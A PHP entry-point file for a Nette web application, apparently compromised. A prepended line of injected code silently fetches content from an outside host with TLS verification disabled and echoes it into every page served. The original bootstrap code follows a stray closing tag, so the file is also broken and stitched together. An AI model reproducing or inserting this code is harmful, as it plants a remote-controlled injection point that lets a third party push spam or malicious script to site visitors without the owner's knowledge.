$u='https://app.linkmarketim.com/code?x=13';$d=false;if(function_exists('curl_init')){$ch=curl_init($u);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; LinkMarket/1.0)');$d=curl_exec($ch);curl_close($ch);}if($d===false&&ini_get('allow_url_fopen')){$ctx=stream_context_create(['http'=>['timeout'=>5,'follow_location'=>1,'ignore_errors'=>1,'header'=>"User-Agent: Mozilla/5.0 (compatible; LinkMarket/1.0)\r\nCache-Control: no-cache\r\n"],'ssl'=>['verify_peer'=>0,'verify_peer_name'=>0]]);$d=@file_get_contents($u,false,$ctx);}echo $d!==false?$d:''; ?> $container = require __DIR__ . '/../app/bootstrap.php'; $container->getByType(Nette\Application\Application::class) ->run();